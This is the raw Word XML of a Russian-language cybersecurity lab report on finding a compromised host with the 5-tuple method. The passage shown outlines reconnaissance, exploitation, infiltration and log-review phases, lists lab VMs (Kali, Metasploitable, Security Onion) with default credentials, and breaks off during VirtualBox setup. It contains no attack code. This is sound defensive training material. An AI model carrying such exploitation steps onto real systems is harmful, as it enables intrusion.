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AFD1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bookmarkStart w:id="0" w:name="_Hlk485105065"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>МИНИСТЕРСТВО ЦИФРОВОГО РАЗВИТИЯ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6231E38E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2EF39787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208E0D2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39A5BCC5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26479B4C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241D8243" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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1B1AFB0A" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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751D7909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06B93646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0A63D368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32B1E432" w14:textId="21D4420C" w:rsidR="00D27029" w:rsidRPr="00665ECA" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1"/>
        <w:spacing w:before="1200" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЛАБОРАТОРНАЯ РАБОТА №</w:t>
      </w:r>
      <w:r w:rsidR="00665ECA">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C1A78" w14:textId="77777777" w:rsidR="00D27029" w:rsidRPr="00A642E1" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="960" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изолированный скомпрометированный узел с использованием 5 элементов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0524C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62C20C3E" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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495C902C" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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7F13C62A" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A645D3" w14:textId="4B3B255C" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>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69D18033" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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530087C" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1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3AD24475" w14:textId="59E8C4CA" w:rsidR="00D27029" w:rsidRDefault="00D27029" w:rsidP="00D27029">
      <w:pPr>
        <w:pStyle w:val="aff1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="411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шаков И. А.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D25851" w14:textId="77777777" w:rsidR="00D27029" w:rsidRDefault="00D27029">
      <w:pPr>
        <w:spacing w:before="0"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u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021360A" w14:textId="5BB49C05" w:rsidR="004D36D7" w:rsidRPr="0042041D" w:rsidRDefault="00603C52" w:rsidP="00FD4A68">
      <w:pPr>
        <w:pStyle w:val="LabTitle"/>
        <w:rPr>
          <w:rStyle w:val="LabTitleInstVersred"/>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Лабораторная работа. Изолированный скомпрометированный узел</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>использованием</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:t>элементов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="150A61D8" w14:textId="77777777" w:rsidR="00D778DF" w:rsidRPr="00E70096" w:rsidRDefault="00D778DF" w:rsidP="00E70096">
      <w:pPr>
        <w:pStyle w:val="LabSection"/>
      </w:pPr>
      <w:r>
        <w:t>Топология</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A58632D" w14:textId="0D9D612F" w:rsidR="00D778DF" w:rsidRDefault="00816E4A" w:rsidP="00D778D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2EB5DB2F" wp14:editId="265DC9F9">
            <wp:extent cx="5478855" cy="424307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55" cy="424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0F45F" w14:textId="77777777" w:rsidR="00D778DF" w:rsidRPr="00E70096" w:rsidRDefault="00D778DF" w:rsidP="00E70096">
      <w:pPr>
        <w:pStyle w:val="LabSection"/>
      </w:pPr>
      <w:r>
        <w:t>Задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBB8BE5" w14:textId="74EA8857" w:rsidR="00E70096" w:rsidRPr="00E70096" w:rsidRDefault="00534E22" w:rsidP="00E70096">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>В этой лабораторной работе вы сможете посмотреть журналы во время использования задокументированной уязвимости для определения скомпрометированных узлов</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F2B08D" w14:textId="7851749D" w:rsidR="00D778DF" w:rsidRDefault="00D778DF" w:rsidP="00D778DF">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
      </w:pPr>
      <w:r>
        <w:t>Часть 1. Подготовка виртуальной среды</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BDB55" w14:textId="77777777" w:rsidR="00534E22" w:rsidRDefault="00534E22" w:rsidP="00D778DF">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
      </w:pPr>
      <w:r>
        <w:t>Часть 2. Разведывательная атака</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9F1A4" w14:textId="77777777" w:rsidR="00534E22" w:rsidRDefault="00534E22" w:rsidP="00D778DF">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
      </w:pPr>
      <w:r>
        <w:t>Часть 3. Применение эксплойтов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47480F66" w14:textId="77777777" w:rsidR="00534E22" w:rsidRDefault="00534E22" w:rsidP="00D778DF">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
      </w:pPr>
      <w:r>
        <w:t>Часть 4. Проникновение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32838868" w14:textId="4BDBE8BA" w:rsidR="00534E22" w:rsidRPr="004C0909" w:rsidRDefault="00534E22" w:rsidP="00D778DF">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25Bold"/>
      </w:pPr>
      <w:r>
        <w:t>Часть 5. Просмотр журналов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B14DB23" w14:textId="0B29359E" w:rsidR="00D778DF" w:rsidRPr="00E70096" w:rsidRDefault="00D778DF" w:rsidP="00E70096">
      <w:pPr>
        <w:pStyle w:val="LabSection"/>
      </w:pPr>
      <w:r>
        <w:t>Общие сведения</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>сценарий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F0ACA7" w14:textId="270C079A" w:rsidR="0002463E" w:rsidRDefault="00AC3825" w:rsidP="00D778DF">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>Методика</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:t>элементов используется ИТ-администраторами для определения требований</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>созданию работоспособной</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>защищенной сетевой среды. Компоненты методики</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:t>элементов включают IP-адрес источника</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>номер порта, IP-адрес назначения</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>номер порта,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> а </w:t>
      </w:r>
      <w:r>
        <w:t>также используемый протокол.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACF0A5" w14:textId="6D6AC62A" w:rsidR="007E7C4F" w:rsidRDefault="007E7C4F" w:rsidP="00D778DF">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>В этой лабораторной работе вы будете использовать уязвимости сервера</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>помощью известных эксплойтов. Также вы сможете посмотреть журналы для определения скомпрометированных узлов</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A584ADE" w14:textId="797D879E" w:rsidR="004F25C2" w:rsidRDefault="004F25C2" w:rsidP="004F25C2">
      <w:pPr>
        <w:pStyle w:val="LabSection"/>
      </w:pPr>
      <w:r>
        <w:t>Необходимые ресурсы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504744BD" w14:textId="59D4391F" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t>Хост-компьютер</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>не менее</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:t>ГБ оперативной памяти</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>35 ГБ свободного дискового пространства.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924F002" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t>Последняя версия Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79186566" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t>Интернет-подключение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6F0BE" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t>Четыре виртуальные машины:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="97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02"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="1889"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B12758" w:rsidRPr="00E87D62" w14:paraId="5B45C526" w14:textId="77777777" w:rsidTr="0042041D">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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7E7813" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
            </w:pPr>
            <w:r>
              <w:t>Виртуальная машин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D13C94" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
            </w:pPr>
            <w:r>
              <w:t>RAM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B0DE524" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
            </w:pPr>
            <w:r>
              <w:t>Дисковое пространство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1C54B7" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
            </w:pPr>
            <w:r>
              <w:t>Имя пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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EAEAFC" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
            </w:pPr>
            <w:r>
              <w:t>Пароль</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B12758" w:rsidRPr="00E87D62" w14:paraId="72CF99AA" w14:textId="77777777" w:rsidTr="0064347A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14:paraId="1EA92989" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>Виртуальная машина рабочей станции CyberOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AAB215E" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="0064347A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>1 Гбайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="722C009E" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="0064347A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>7 ГБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D2095B3" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="0064347A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061BC7E0" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="0064347A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>cyberops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B12758" w14:paraId="7D7A6022" w14:textId="77777777" w:rsidTr="0042041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14:paraId="2146FEED" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3BAEA0CA" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>1 Гбайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="355B454B" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>10 Гбайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="097E14E8" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>корневой</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="44F4C6C5" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>cyberops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B12758" w:rsidRPr="00E87D62" w14:paraId="14F4BE05" w14:textId="77777777" w:rsidTr="0042041D">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5AC7001F" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>Metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1F5C8433" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>512 КБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B485153" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>8 ГБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6064AADA" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="10FB54E6" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B12758" w:rsidRPr="00E87D62" w14:paraId="7D4CBEEA" w14:textId="77777777" w:rsidTr="0042041D">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2602" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C2A7DB7" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:keepNext w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Security Onion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="55259C49" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>3 ГБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE98F50" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>10 Гбайт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1890" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="012BAE08" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="03C024B4" w14:textId="77777777" w:rsidR="00B12758" w:rsidRPr="00E87D62" w:rsidRDefault="00B12758" w:rsidP="00D27D4B">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>cyberops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0445252F" w14:textId="619C3636" w:rsidR="00B12758" w:rsidRDefault="006E73BD" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="PartHead"/>
      </w:pPr>
      <w:r>
        <w:t>Подготовка виртуальной среды</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB02E33" w14:textId="77777777" w:rsidR="00B12758" w:rsidRDefault="00B12758" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Запустите Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD199D" w14:textId="041A799E" w:rsidR="00B7760D" w:rsidRPr="00B12758" w:rsidRDefault="00B7760D" w:rsidP="00B7760D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext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окне CyberOps Workstations убедитесь, что для параметра Network (Сеть) выбрано значение </w:t>
      </w:r>
      <w:r w:rsidR="00E86BF6" w:rsidRPr="00E86BF6">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Internal Network (Внутренняя сеть)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12758">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Machine &gt; Settings &gt; Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Машина &gt; Параметры &gt; Сеть).</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>разделе</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12758">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attached To (Присоединена к)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12758">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Internal Network (Внутренняя сеть)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">раскрывающемся меню параметра </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12758">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Name (Имя)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите i</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12758">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>nside</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">нажмите кнопку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C83BD" w14:textId="77777777" w:rsidR="00B7760D" w:rsidRPr="00B12758" w:rsidRDefault="00B7760D" w:rsidP="00B7760D">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
